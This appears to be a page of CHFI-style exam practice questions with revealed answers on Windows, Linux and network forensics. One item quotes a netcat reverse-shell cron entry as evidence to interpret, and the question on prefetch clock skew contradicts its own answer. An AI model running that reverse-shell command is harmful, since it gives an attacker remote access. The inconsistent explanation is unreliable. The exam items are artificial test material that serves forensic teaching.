Courseiva

CCNA Chfi Os Network Questions

75 of 167 questions · Page 1/3 · Chfi Os Network topic · Answers revealed

1
Multi-Selecteasy

Which TWO of the following are common persistence mechanisms used by malware on Windows systems? (Select two.)

Select 2 answers
A.USBSTOR registry key
B.Prefetch files
C.Scheduled Tasks
D.LNK files
E.Registry Run keys (e.g., HKLM\Software\Microsoft\Windows\CurrentVersion\Run)
AnswersC, E

Scheduled Tasks let malware register a trigger that launches its payload at logon, boot or on a timer, surviving reboots and often masquerading as legitimate maintenance. This satisfies the persistence requirement by re-establishing execution without user interaction.

Why this answer

Scheduled Tasks (C) are a common persistence mechanism because malware can register a task via schtasks.exe or the Task Scheduler COM API to execute a payload at logon, on a schedule, or on system events, surviving reboots. Registry Run keys (E), such as HKLM\Software\Microsoft\Windows\CurrentVersion\Run and HKCU equivalents, are classic autostart locations that Windows processes at user logon, so malware placed there launches automatically each session. The other options are forensic artifacts rather than persistence methods: USBSTOR records historical USB mass-storage connections, Prefetch files evidence program execution for performance, and LNK files are shortcut artifacts often used for initial execution or user bait, not for maintaining persistence.

Exam trap

EC-Council often tests the distinction between artifacts of execution (like Prefetch and LNK files) and actual persistence mechanisms that cause automatic re-execution, leading candidates to mistakenly select options that indicate malware ran but do not ensure it runs again.

2
Multi-Selecteasy

Which TWO of the following are tools that can be used for timeline analysis in digital forensics?

Select 2 answers
A.Wireshark
B.Nmap
C.log2timeline
D.FTK Imager
E.Plaso
AnswersC, E

log2timeline aggregates timestamped artefacts from filesystems, registry hives, browser histories and logs into a single chronological bodyfile, directly satisfying the stem's timeline-analysis requirement. Its super-timeline output lets investigators correlate events across disparate sources, which is precisely the capability the question demands.

Why this answer

log2timeline (C) is correct because it is the original Perl-based tool designed to parse many artifact sources and generate a bodyfile of timestamped events, which is the foundational step of building a forensic timeline. Plaso (E) is correct because it is the successor to log2timeline, and its psort.py utility correlates and sorts the parsed events into a super-timeline for chronological analysis. Wireshark (A) is a network protocol analyzer for capturing and inspecting packet traffic, not a timeline generator.

Nmap (B) is a network discovery and port-scanning tool used for host and service enumeration. FTK Imager (D) is an imaging and preview tool for acquiring and browsing forensic images, not a timeline analysis tool.

Exam trap

EC-Council often tests the distinction between tools used for network analysis (Wireshark, Nmap) versus tools used for host-based timeline analysis (log2timeline, Plaso), leading candidates to confuse packet capture utilities with forensic timeline generators.

3
MCQmedium

During a forensic investigation of a compromised Linux server, an analyst checks /var/log/auth.log and finds multiple entries like "Failed password for root from 10.0.0.5 port 22 ssh2". Which tool is BEST suited to analyze the timeline of these events?

A.Nmap
B.Wireshark
C.log2timeline
D.Autopsy
AnswerC

log2timeline parses diverse log and artefact sources into a unified chronological bodyfile, letting the analyst correlate the repeated SSH authentication failures from 10.0.0.5 against other system events. This satisfies the requirement to analyse event timeline ordering, not merely read entries.

Why this answer

C is correct because log2timeline (part of the Plaso framework) is specifically designed to parse multiple log sources, including /var/log/auth.log, and create a super timeline that correlates events by timestamp. This allows the analyst to reconstruct the exact sequence of failed SSH login attempts from 10.0.0.5, which is essential for timeline analysis in forensic investigations.

Exam trap

The EC-Council CHFI exam often tests the distinction between network analysis tools (Nmap, Wireshark) and forensic timeline tools (log2timeline), trapping candidates who confuse packet-level analysis with log-based event correlation.

How to eliminate wrong answers

Option A is wrong because Nmap is a network scanning tool used to discover hosts and services, not to analyze log file timestamps or event timelines. Option B is wrong because Wireshark is a packet capture and analysis tool that inspects live or recorded network traffic, not static log files like /var/log/auth.log. Option D is wrong because Autopsy is a digital forensics platform for disk image analysis and file system forensics, but it lacks native capability to parse and correlate syslog/auth.log entries into a unified timeline without additional plugins or manual import.

4
Multi-Selectmedium

A forensic analyst is examining a Mac system for evidence of malicious activity. Which THREE artifacts are commonly analyzed in macOS forensics?

Select 3 answers
A.Prefetch files
B.bash_history
C.Unified logging
D.FSEvents
E..plist files
AnswersC, D, E

Unified logging is the core of macOS system and application data collection, introduced in macOS Sierra (10.12). It stores structured logs in a binary format under /private/var/db/diagnostics/ and can be queried using the log command to filter by process, time, and predicate. Unlike other options, it offers a centralized, tamper-evident record of system behavior, making it the strongest choice for forensic investigation.

Why this answer

macOS forensics frequently examines unified logs (for system events), .plist files (for configuration and application data), and FSEvents (for file system change history). bash_history is not the default for macOS (zsh is default). Prefetch files are Windows-only.

5
MCQmedium

An incident responder finds the following entry in a Linux cron job: "*/5 * * * * root nc -e /bin/sh 10.0.0.5 4444". What is the purpose of this cron job?

A.Port scan 10.0.0.5 every 5 minutes
B.Establish a reverse shell back to the attacker every 5 minutes
C.Log system activity to a remote server
D.Download malicious software from 10.0.0.5
AnswerB

The nc command with -e /bin/sh pipes a shell to the remote host, and the cron schedule runs it every five minutes. This establishes a recurring reverse shell, giving the attacker persistent interactive access to the compromised Linux system.

Why this answer

The cron job runs every 5 minutes (as specified by '*/5') and executes 'nc -e /bin/sh 10.0.0.5 4444'. The '-e' flag in netcat (nc) binds /bin/sh to the connection, meaning when the command runs, it connects to 10.0.0.5 on port 4444 and provides a shell to the remote listener. This is a classic reverse shell technique, allowing an attacker to gain interactive command execution on the compromised Linux host.

Exam trap

In EC-CHFI, the distinction between a reverse shell and a bind shell is key; here the trap is confusing the '-e' flag (which executes a program on connection) with a download or scan operation, leading candidates to overlook the shell execution aspect.

How to eliminate wrong answers

Option A is wrong because the command does not perform a port scan; netcat with '-e' is used for shell binding, not for scanning ports (which would require flags like '-z' or '-v'). Option C is wrong because there is no logging mechanism involved; the command does not redirect output to a log file or use syslog, and the remote server is receiving a shell, not log data. Option D is wrong because the command does not download any file; it establishes an interactive shell session, and there is no transfer of malicious software via wget, curl, or similar.

6
MCQeasy

Which Windows Event ID is generated when a service is installed on a system?

A.4624
B.7045
C.4688
D.4720
AnswerB

Event ID 7045 is a System log event generated by the Service Control Manager (SCM) when a new service is installed or registered on a Windows host. It records the service name, executable path, service type, and start type, and is the definitive artifact that identifies service installation, even if the service binary is later removed. This event appears in the System log and can be correlated with Process Creation event 4688 to trace which process launched the installation command.

Why this answer

Event ID 7045 is logged in the Windows System event log when a new service is installed on the system. This event records the service name, image path, service type, and start mode, making it a critical artifact for forensic investigators tracking unauthorized service installations.

Exam trap

The trap here is that candidates often confuse Event ID 7045 with process creation (4688) or logon events (4624), because service installation involves starting a process and may require authentication, but the specific event for the installation itself is uniquely 7045.

How to eliminate wrong answers

Option A is wrong because Event ID 4624 is an account logon success event, not a service installation event. Option C is wrong because Event ID 4688 is a process creation event, triggered when a new process is started, not when a service is installed. Option D is wrong because Event ID 4720 is a user account creation event, which logs when a new user is added to the security principal database, not a service installation.

7
MCQeasy

In network forensics, which tool is specifically designed for packet capture and analysis, allowing examiners to inspect individual packets and reconstruct network conversations?

A.Tcpdump
B.Netstat
C.Nmap
D.Wireshark
AnswerD

Wireshark is a full-featured network protocol analyzer that captures live traffic from network interfaces and also reads saved pcap/pcapng files. Its interactive GUI lets investigators drill down through every protocol layer, reassemble TCP streams, decode hundreds of application protocols, follow HTTP/email/file transfers, and apply display filters or statistical summaries to isolate evidence. Wireshark's deep packet inspection, packet-bytes view, and exportable payload capabilities make it the standard go-to tool for network forensics.

Why this answer

Wireshark is the correct answer because it is a full-featured packet analyzer that captures live network traffic and provides deep inspection of hundreds of protocols. It allows examiners to filter packets, follow TCP streams, and reconstruct entire network conversations, making it the standard tool for network forensics analysis.

Exam trap

The EC-CHFI exam often tests the distinction between packet capture tools (Tcpdump, Wireshark) and network diagnostic/scanning tools (Netstat, Nmap), leading candidates to confuse Tcpdump's capture capability with Wireshark's advanced analysis and reconstruction features.

How to eliminate wrong answers

Option A is wrong because Tcpdump is a command-line packet capture tool that can capture packets but lacks the graphical interface and advanced analysis features (e.g., protocol dissection, stream reassembly) needed for in-depth forensic inspection. Option B is wrong because Netstat displays network connections, routing tables, and interface statistics, but it does not capture or analyze individual packets. Option C is wrong because Nmap is a network scanning and discovery tool used for port scanning and service enumeration, not for packet capture or conversation reconstruction.

8
MCQhard

During a forensic investigation, you find a prefetch file created at 03:15:22 UTC on the system. The corresponding executable's last modified timestamp is 02:30:00 UTC, and the system date/time shows a discrepancy of +5 minutes. What is the MOST accurate interpretation regarding the file execution time?

A.The program was executed at 02:30:00 UTC.
B.The program was executed at 03:15:22 UTC.
C.Execution time cannot be determined from prefetch files alone.
D.The program was executed at 03:10:22 UTC after adjusting for clock skew.
AnswerD

The prefetch file was created at system time 03:15:22, but the system clock is +5 minutes fast, so the actual UTC time is 03:10:22. This option correctly adjusts for clock skew and is the most accurate interpretation.

Why this answer

The prefetch file creation timestamp records the system time at execution. The system clock is +5 minutes ahead, so actual UTC at execution is 03:10:22 (03:15:22 minus 5 minutes). Option D correctly adjusts for this clock skew.

Option B is wrong because it ignores the clock discrepancy, which is a known issue in forensic analysis.

Exam trap

The CHFI exam often tests the misconception that the executable's last modified timestamp or the prefetch file's internal 'last run time' is the primary indicator of execution time, when in fact the prefetch file's creation timestamp is the key for first execution.

How to eliminate wrong answers

Option A is wrong because the executable's last modified timestamp indicates when the file was last changed on disk, not when it was executed; execution time is derived from the prefetch file's creation timestamp, not the executable's metadata. Option C is wrong because prefetch files do provide a reliable indicator of first execution time via their creation timestamp, though subsequent executions update the 'last run time' within the file. Option D is wrong because adjusting for clock skew would require subtracting the +5-minute discrepancy from the prefetch timestamp (03:15:22 - 0:05 = 03:10:22) only if the prefetch timestamp were in true UTC, but the prefetch timestamp is recorded in system local time (which already includes the +5-minute offset), so no adjustment is needed; the system's reported UTC is already skewed.

9
MCQhard

A forensic examiner is analyzing a compromised Linux system and finds a suspicious cron job in /var/spool/cron/crontabs/root that executes a script every hour. The script is located in /tmp/.hidden/update.sh. What is the BEST next step?

A.Reboot the system to clear the cron job from memory
B.Capture the script for analysis and preserve the cron entry as evidence
C.Delete the cron job immediately to prevent further damage
D.Run the script in a sandbox to determine its functionality
AnswerB

The correct response is to capture the referenced script and the cron entry itself using forensically sound methods—ideally via a live acquisition that records metadata such as file timestamps, owner, permissions, and the full path, while computing hashes (e.g., SHA-256) to verify integrity. The cron entry should be preserved from the applicable location (e.g., /var/spool/cron/crontabs/user, /etc/cron.d/, or /etc/crontab) with its modification time logged. This maintains chain of custody and enables later analysis in a controlled environment without altering the original system state.

Why this answer

The cron job entry in /var/spool/cron/crontabs/root and the associated script in /tmp/.hidden/update.sh are critical pieces of evidence. The best next step is to capture the script for malware analysis and preserve the cron entry (e.g., by making a forensic copy of the file and its metadata) to maintain the integrity of the evidence chain. Deleting or rebooting would destroy volatile data and potentially alert the attacker, while running the script without proper containment could cause further compromise.

Exam trap

EC-Council often tests the principle that preservation of evidence must precede any active response (like deletion or execution), and the trap here is that candidates mistakenly choose to delete or run the script immediately, confusing incident response with forensic preservation.

How to eliminate wrong answers

Option A is wrong because rebooting the system would clear volatile memory (RAM) and may destroy in-memory artifacts, but the cron job is stored on disk in /var/spool/cron/crontabs/root and would persist across reboots; it does not clear the cron job from disk. Option C is wrong because deleting the cron job immediately destroys evidence and could alert an attacker, violating forensic best practices of preserving the original state before analysis. Option D is wrong because running the script in a sandbox is a valid analysis step, but it should be performed only after the script and cron entry have been properly captured and preserved as evidence; the question asks for the 'best next step,' which is preservation first.

10
Multi-Selecthard

Which FOUR of the following are persistence mechanisms that can be used on Linux systems?

Select 4 answers
A.Prefetch files
B.SSH authorized keys
C.Startup scripts in /etc/init.d
D.Cron jobs
E.Modifications to /etc/passwd to add new users
AnswersB, C, D, E

SSH authorized keys are a persistence mechanism because they enable an attacker to retain remote access without needing to re-exploit the system each time; by placing a public key in a user's ~/.ssh/authorized_keys file, the attacker can authenticate over SSH indefinitely, even if the user's password is changed. While they do not autonomously execute commands like cron or init scripts, the ongoing availability of a credentialed login channel is a recognized persistence technique in intrusion activity and should be examined in a forensic investigation.

Why this answer

Persistence mechanisms on Linux include SSH authorized keys (B), which allow an attacker to maintain remote access by adding their public key to the target user's authorized_keys file; startup scripts in /etc/init.d (C), which execute at boot; cron jobs (D), which run scheduled tasks; and modifications to /etc/passwd (E) to create persistent user accounts. Prefetch files (A) are Windows-specific and not a Linux persistence mechanism.

Exam trap

The trap is selecting Prefetch files (A), which are often associated with persistence on Windows but do not apply to Linux. All other options are valid Linux persistence mechanisms.

11
MCQmedium

During a network breach investigation, an analyst examines NetFlow records and sees large data transfers from a server to an external IP address during off-hours. Which type of activity does this MOST likely indicate?

A.Normal software update download
B.Scheduled backup to a cloud service
C.Data exfiltration by an attacker
D.Denial-of-service attack against the server
AnswerC

Data exfiltration is the correct interpretation because an attacker who has gained access will often locate and stage sensitive files, compress and encrypt them to avoid detection, and then transmit that archive to an external server they control. The combination of large outbound traffic, off-hours timing, and an unknown destination IP is a classic indicator of the exfiltration phase of an intrusion. This aligns with the MITRE ATT&CK technique T1048 (Exfiltration Over Alternative Protocol) and warrants immediate correlation with process execution and endpoint logs to identify the staging artifacts.

Why this answer

Large data transfers from a server to an external IP address during off-hours are a classic indicator of data exfiltration. NetFlow records capture metadata such as source/destination IPs, ports, and byte counts; a sudden, high-volume outbound flow to an unfamiliar external IP outside normal business hours strongly suggests an attacker is copying sensitive data out of the network, not legitimate traffic.

Exam trap

EC-CHFI often tests the distinction between outbound data flows (exfiltration) and inbound traffic (DoS), so the trap here is confusing the direction of the traffic—candidates may pick DoS because they associate large transfers with attacks, but DoS targets the server with inbound floods, not outbound data theft.

How to eliminate wrong answers

Option A is wrong because software update downloads typically originate from the server to known vendor update servers (e.g., Microsoft, Adobe) and occur during business hours or maintenance windows, not off-hours to an arbitrary external IP. Option B is wrong because scheduled backups to a cloud service usually use well-known destinations (e.g., AWS S3, Azure Blob) with consistent timing and are often encrypted; the scenario lacks any mention of a recognized cloud provider or backup schedule. Option D is wrong because a denial-of-service attack against the server would generate high inbound traffic to the server, not large outbound data transfers from the server to an external IP.

12
Multi-Selectmedium

Which TWO of the following are Windows artifacts that can provide evidence of file execution, including timestamps and paths?

Select 2 answers
A.Event ID 4720
B.SAM registry hive
C.Prefetch files (*.pf)
D.Pagefile.sys
E.LNK files
AnswersC, E

Prefetch files are created by Windows for each executable launched from a non-readonly path (with Application Prefetching enabled) to speed up subsequent loads. They store the executable's file path, a hash of the path, the number of times it was run, the last run timestamp, and the list of files and devices accessed during the first few seconds of execution. These artifacts allow forensic analysts to determine whether a specific application was executed, when it was executed, and how frequently.

Why this answer

Prefetch files (*.pf) are correct because Windows creates them in C:\Windows\Prefetch when applications execute, and each .pf file records the executable name, run count, last-run timestamps, and referenced file/directory paths, directly evidencing execution. LNK files are correct because Windows shortcut files, typically found in Recent Items, Office Recent, or Jump Lists, store the target path, volume information, and MAC timestamps of the referenced file, showing that a file was opened or executed. Event ID 4720 is not correct because it records user account creation in the Security log, not file execution.

The SAM registry hive is not correct because it stores local account and group information, including password hashes, not execution evidence. Pagefile.sys is not correct because it is virtual memory swap space that may contain residual data but is not a structured artifact specifically recording file execution timestamps and paths.

Exam trap

The CHFI exam often tests the distinction between artifacts that directly record execution (Prefetch, LNK) versus those that store unrelated system data (SAM, Event ID 4720) or provide only indirect evidence (Pagefile.sys), leading candidates to confuse memory artifacts with structured execution logs.

13
MCQeasy

A security analyst investigates a Windows system and finds an event with ID 4625 in the Security log. What does this event indicate?

A.A failed logon attempt
B.A successful user logon
C.A service was installed
D.A new user account was created
AnswerA

Event ID 4625 is the Windows Security log event that specifically records a failed logon attempt. It is generated whenever an authentication fails, carrying details such as the target account name, source IP address, logon type, and a status/error code like 0xC000006A (bad password). Since the question centers on this exact event identifier, the security analyst correctly identifies the event as a failed logon.

Why this answer

Event ID 4625 in the Windows Security log specifically indicates a failed logon attempt. This event is generated by the Local Security Authority Subsystem Service (LSASS) whenever an authentication attempt fails, regardless of the logon type (interactive, network, service, etc.). The event details include the account name, source IP address, and failure reason code (e.g., 0xC000006D for bad username/password).

Exam trap

The trap here is that candidates confuse Event ID 4625 with 4624 (successful logon) or assume any Security log event with 'logon' in the name indicates success, but CHFI tests the precise numeric ID and its specific meaning.

How to eliminate wrong answers

Option B is wrong because a successful user logon is recorded as Event ID 4624, not 4625. Option C is wrong because a service installation is logged under System log with Event ID 7045 (Service Control Manager), not in the Security log. Option D is wrong because a new user account creation is recorded as Event ID 4720 in the Security log, not 4625.

14
MCQmedium

In a Windows forensic investigation, which registry key is used to examine programs that automatically start at system boot for all users?

A.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
B.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
C.HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
D.NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run
AnswerC

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run is the correct answer because it is a machine-wide authority under the HKLM root, which is visible to and processed for every user who logs onto the system. Programs specified in its String or ExpandString values are executed automatically with the user's privileges at each logon. This persistence location is commonly targeted by malware, and forensic analysts check it to identify software that runs for all users.

Why this answer

The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run registry key stores programs that automatically start at system boot for all users. This is a system-wide location, meaning any executable listed here runs regardless of which user logs in, making it critical for forensic analysis of persistent malware or unauthorized startup applications.

Exam trap

EC-Council often tests the distinction between system-wide (HKLM) and per-user (HKCU) Run keys, and candidates mistakenly choose HKEY_CURRENT_USER because it is more commonly referenced in everyday Windows use, forgetting the 'for all users' requirement in the question.

How to eliminate wrong answers

Option A is wrong because HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run applies only to the currently logged-in user, not all users. Option B is wrong because HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services controls Windows services (which start via the Service Control Manager), not standard startup programs listed in the Run key. Option D is wrong because NTUSER.DAT is the registry hive for a specific user profile, and its path is per-user, not system-wide; it cannot affect all users at boot.

15
MCQhard

A forensic examiner recovers a Windows 10 system and finds a prefetch file for powershell.exe with a last run time of 3 days ago, but the system's security logs show no interactive logons from that user. What does this discrepancy suggest?

A.PowerShell was executed as part of a scheduled task or service
B.The prefetch file is corrupted
C.The user deleted their profile
D.The system clock was changed
AnswerA

PowerShell launched via a scheduled task or service executes under logon type 4 (batch) or 5 (service), not interactive logon type 2. Consequently, the Security log will not contain a corresponding 4624 interactive logon event, even though prefetch records the powershell.exe execution with a valid last run time. This exactly matches the observed discrepancy, making non-interactive execution the correct forensic explanation.

Why this answer

A is correct because PowerShell.exe can be executed by non-interactive processes such as scheduled tasks or services, which do not generate interactive logon events (Event ID 4624) in the Security log. The prefetch file records the last run time regardless of the execution context, so a discrepancy between the prefetch timestamp and the absence of interactive logons indicates that PowerShell was launched by a system-level or automated mechanism, not by a user logging on interactively.

Exam trap

EC-Council often tests the misconception that prefetch files only record user-initiated executions, leading candidates to assume the timestamp must be wrong or that the user must have logged on, when in fact prefetch captures all executions including those from system services and scheduled tasks.

How to eliminate wrong answers

Option B is wrong because prefetch files are not typically corrupted in a way that would produce a plausible last run time without any corresponding logon activity; corruption would more likely result in unreadable timestamps or missing entries. Option C is wrong because deleting a user profile does not remove prefetch entries or alter the last run time recorded for an executable; the prefetch file would still reflect the last execution before deletion. Option D is wrong because changing the system clock would affect all timestamps uniformly, including both the prefetch file and security logs, so it would not create a discrepancy between the two; the discrepancy would only occur if the clock change was applied between the execution and the log generation, which is not a typical forensic scenario.

16
MCQeasy

Which Windows Event ID is generated when a new service is installed on a system?

A.4624
B.7045
C.4648
D.4720
AnswerB

Event ID 7045 is the Windows System log event emitted by the Service Control Manager whenever a new service is installed or registered on the system. It contains the service name, image path, service type, start type, and the account under which the service runs. This is the definitive event for detecting service installations, although on modern Windows versions event 4697 provides similar service-creation auditing in the Security log.

Why this answer

Event ID 7045 is logged in the Windows System event log when a new service is installed on the system. This event is generated by the Service Control Manager (SCM) and records details such as the service name, binary path, service type, and start mode, making it a critical artifact for forensic analysis of unauthorized service installations.

Exam trap

The trap here is that candidates confuse Event ID 7045 with Event ID 4697 (service installation in the Security log) or mistakenly associate Event ID 4624 (logon success) with service accounts, but the EC-CHFI exam specifically tests the System log Event ID 7045 for service installation.

How to eliminate wrong answers

Option A is wrong because Event ID 4624 is an account logon success event, not related to service installation. Option C is wrong because Event ID 4648 indicates a logon attempt using explicit credentials (e.g., RunAs), not a service installation. Option D is wrong because Event ID 4720 is generated when a new user account is created in Active Directory, not when a service is installed.

17
MCQeasy

Which tool is specifically designed for timeline analysis in digital forensics and is the command-line version of the log2timeline framework?

A.Autopsy
B.Sleuth Kit
C.Plaso
D.Wireshark
AnswerC

Plaso, also known as log2timeline, is the command-line tool specifically engineered for timeline analysis. It recursively parses numerous artifact types—such as file system metadata, registry hives, and application logs—to create comprehensive 'super timelines' with unified timestamps. Plaso aggregates and normalizes timestamps into a single, queryable event database (often SQLite or Elasticsearch), making it the de facto standard for advanced timeline construction in forensic investigations.

Why this answer

Plaso (Python Log2Timeline) is the command-line version of the log2timeline framework, specifically engineered for super timeline creation and timeline analysis in digital forensics. It parses multiple log and artifact sources (e.g., Windows Event Logs, Prefetch, Registry hives) into a unified, high-performance timeline database (SQLite or Elasticsearch), enabling examiners to correlate events across time. This makes it the direct answer to a question asking for the CLI tool derived from the log2timeline framework.

Exam trap

EC-Council often tests the distinction between the original Perl-based log2timeline and the Python-based Plaso rewrite, as well as the difference between command-line tools (like Plaso) and GUI tools (like Autopsy, which is based on The Sleuth Kit, not log2timeline).

How to eliminate wrong answers

Option A is wrong because Autopsy is a GUI-based digital forensics platform that provides timeline visualization, but it is not the command-line version of the log2timeline framework; it uses Sleuth Kit and Plaso as backends but is not itself a CLI timeline tool. Option B is wrong because The Sleuth Kit (TSK) is a collection of command-line tools for file system analysis (e.g., fls, icat, mmls) and does not perform timeline analysis or derive from log2timeline; it lacks the log parsing and event correlation engine that Plaso provides. Option D is wrong because Wireshark is a network protocol analyzer for capturing and inspecting packets (e.g., TCP, HTTP, DNS) and has no role in timeline creation from system artifacts; it is unrelated to log2timeline or forensic timeline analysis.

18
MCQeasy

An analyst captures network traffic during an incident and wants to extract files transferred over HTTP. Which Wireshark feature is BEST suited for this task?

A.Follow TCP Stream
B.Statistics > HTTP
C.Export Objects > HTTP
D.Analyze > Expert Info
AnswerC

Export Objects > HTTP is the correct method: Wireshark parses the HTTP conversations in the capture, reassembles the response bodies, handles chunked transfer-encoding and content-encoding, and then presents each recovered object as an individual file ready to be saved. This directly recovers binaries, documents, images, or any other file that was transferred over HTTP, providing the actual artifact for forensic analysis and hash comparison.

Why this answer

Wireshark's 'Export Objects > HTTP' feature is specifically designed to extract files (e.g., images, documents, executables) transferred over HTTP by reassembling the TCP streams and parsing the HTTP response bodies. This feature automates the extraction process, saving the analyst from manually reconstructing each file from raw packets.

Exam trap

The trap here is that candidates confuse 'Follow TCP Stream' (which shows raw data) with a file extraction tool, not realizing that 'Export Objects > HTTP' is the dedicated feature for extracting files from HTTP traffic in Wireshark.

How to eliminate wrong answers

Option A is wrong because 'Follow TCP Stream' only displays the raw ASCII or hex dump of a single TCP session's payload, requiring manual extraction and reconstruction of files from the stream data, which is inefficient for multiple files. Option B is wrong because 'Statistics > HTTP' provides aggregate metrics like request/response counts, methods, and hostnames, but does not extract or export file content. Option D is wrong because 'Analyze > Expert Info' highlights protocol anomalies, errors, or warnings (e.g., malformed packets, retransmissions) and is not designed for file extraction.

19
Multi-Selecthard

Which THREE of the following are common indicators of a web shell on a compromised web server? (Select THREE.)

Select 3 answers
A.Presence of .htaccess files with rewrite rules
B.Files with obfuscated code (e.g., base64 encoded strings)
C.Files located in web-accessible directories (e.g., /uploads) with execute permissions
D.High number of 404 errors in access logs
E.Unusual HTTP POST requests with large payloads to a single script
AnswersB, C, E

Files containing obfuscated code, such as base64-encoded strings wrapped in eval(), gzinflate(), or str_rot13(), are a strong indicator of a web shell because legitimate web applications rarely need to obscure their logic. Obfuscation is deliberately used to hide malicious payloads from static signature-based scanners and to complicate manual inspection. The presence of such encoding in an unexpected file under a web-accessible directory—especially in upload folders—strongly suggests an attacker is trying to evade detection and maintain remote access.

Why this answer

Option B is correct because web shells are frequently hidden by obfuscating their PHP/JSP/ASP code with base64-encoded strings, gzinflate, eval, or similar encoding tricks to evade signature-based detection. Option C is correct because attackers commonly drop web shell files into writable, web-accessible directories such as /uploads or /images and set execute permissions so the web server can run them via HTTP. Option E is correct because a web shell typically receives commands through HTTP POST requests carrying unusually large or repeated payloads to a single script, which is a strong behavioral indicator in access logs.

Option A is not a reliable indicator, since .htaccess files with rewrite rules are a normal, legitimate part of Apache configuration and are used for many benign purposes. Option D is not a reliable indicator either, because a high number of 404 errors usually reflects broken links, scanning noise, or misconfiguration rather than a web shell specifically.

Exam trap

A common trap is to view .htaccess rewrite rules as inherently malicious, but they are a standard Apache feature; the trap is confusing legitimate configuration with attack indicators, leading candidates to select Option A incorrectly.

20
MCQeasy

Which Windows Event ID is generated when a new service is installed on a system, and is often used by malware to establish persistence?

A.4624
B.4648
C.7045
D.4720
AnswerC

Event 7045 is the correct event because it is the Service Control Manager (SCM) event logged in the System event log whenever a new service is installed on the system. This event captures critical persistence indicators, including the service name, image file path, service type, and start type, making it a primary focus for forensic analysts investigating malware that establishes persistence by registering itself as a service. Unlike the Security log events in the other options, 7045 directly maps to the act of creating a service and appears during both legitimate software installs and malicious service creation.

Why this answer

Event ID 7045 is generated by the Windows Service Control Manager (SCM) when a new service is installed on the system. Malware often uses this event to establish persistence by creating a service that automatically starts, and forensic analysts look for 7045 events to detect unauthorized service installations.

Exam trap

The EC-CHFI exam often tests the distinction between Event IDs related to authentication (4624, 4648) and those related to system configuration changes (7045), so candidates may confuse logon events with service installation events.

How to eliminate wrong answers

Option A is wrong because Event ID 4624 indicates a successful logon to the system, not a service installation. Option B is wrong because Event ID 4648 logs explicit credential usage (e.g., RunAs), not service creation. Option D is wrong because Event ID 4720 tracks user account creation in Active Directory, not service installation.

21
MCQeasy

Which Windows registry hive stores user-specific configuration and is loaded when a user logs in, containing artifacts such as recently accessed files and application settings?

A.SECURITY
B.NTUSER.DAT
C.HKLM\SAM
D.SYSTEM
AnswerB

Each user profile has a NTUSER.DAT file that is loaded into the registry's HKEY_CURRENT_USER hive upon user logon. It stores registry keys and values specific to that user, such as desktop settings, environment variables, application preferences, and many forensic artifacts like recently used files, typed URLs, and application-specific data. This is exactly the per-user configuration store.

Why this answer

NTUSER.DAT is the registry hive that contains user-specific settings and is loaded into HKEY_CURRENT_USER upon logon. It includes UserAssist, MRU lists, and other user activity artifacts.

22
MCQhard

An analyst is examining a PCAP file in Wireshark and notices a series of TCP SYN packets sent to multiple ports on a single IP address, with no subsequent SYN-ACK replies. What type of network activity does this indicate?

A.A denial of service attack
B.A man-in-the-middle attack
C.A TCP handshake for normal connection establishment
D.A port scan attempting to identify open ports
AnswerD

This is a classic TCP SYN (half-open) scan, in which a scanner sends a SYN packet to each port and determines that a port is open if it receives a SYN-ACK response, while a RST indicates closed or filtered. Because the scanner immediately responds with an RST (or simply ignores the SYN-ACK) rather than completing the three-way handshake with an ACK, no full TCP connection is established, making this a quick and stealthy method for mapping open services. The pcap will show many SYN → SYN-ACK → RST sequences, with the scanner never sending the final ACK that would complete a legitimate connection.

Why this answer

Sending SYN packets to many ports without receiving SYN-ACKs indicates a port scan, likely a TCP SYN scan, to discover open ports.

23
MCQmedium

A forensics investigator finds a suspicious LNK file on a Windows system that points to a script located on a remote share. What is the PRIMARY forensic significance of this LNK file?

A.It is evidence of USB device insertion.
B.It may be part of a lateral movement technique using remote execution.
C.It shows the user's recently accessed files.
D.It is a prefetch artifact indicating the script was executed.
AnswerB

This is the correct interpretation: an .lnk file that points to a remote share or contains a UNC path (e.g., \\attacker-server\payload\.scr) is a recognized lateral movement technique. Attackers use LNK shortcuts as bootstrap payloads delivered through PsExec, scheduled tasks, or WMI, where the shortcut is written to a target host and triggers remote execution of a malicious script or binary. The shortcut's TargetPath and Arguments fields are the forensic keys to identifying this behavior.

Why this answer

An LNK file pointing to a remote share is a classic indicator of lateral movement, often used in techniques like SMB-based remote execution or PsExec. The LNK file itself does not execute code, but when opened, it triggers the Windows shell to connect to the remote share and run the script, allowing an attacker to move from one system to another without dropping a binary on the target. This is a key forensic artifact for identifying network-based propagation in attacks such as ransomware or APT intrusions.

Exam trap

The trap here is that candidates confuse LNK files with Prefetch artifacts or assume all LNK files indicate user activity, when in fact an LNK targeting a remote share is a strong signal of lateral movement via SMB/remote execution, not local execution or USB history.

How to eliminate wrong answers

Option A is wrong because LNK files are not specific to USB insertion; USB device insertion is typically evidenced by USBSTOR registry keys, setupapi.dev.log, or PnP events, not by the presence of an LNK file pointing to a remote share. Option C is wrong because LNK files can indicate recently accessed files only if they are in the user's Recent folder (e.g., %APPDATA%\Microsoft\Windows\Recent), but this LNK points to a remote share, not a local file, and its primary significance is not user access history but potential malicious remote execution. Option D is wrong because Prefetch files (.pf) are created when an executable runs locally, not when a script is launched via an LNK file; the LNK file itself is not a Prefetch artifact, and execution of the script would generate a Prefetch for the script host (e.g., wscript.exe or cmd.exe) only if it runs locally, not from a remote share.

24
MCQhard

During a forensic investigation of a compromised Linux server, you find the following entry in /var/log/auth.log: 'Mar 10 03:14:15 server sshd[1234]: Accepted publickey for root from 10.0.0.5 port 54321 ssh2: RSA SHA256:AbCdEf123456'. Which artifact should you examine next to determine if unauthorized key-based access occurred?

A./var/log/syslog
B./etc/ssh/sshd_config
C.~/.ssh/authorized_keys
D./etc/passwd
AnswerC

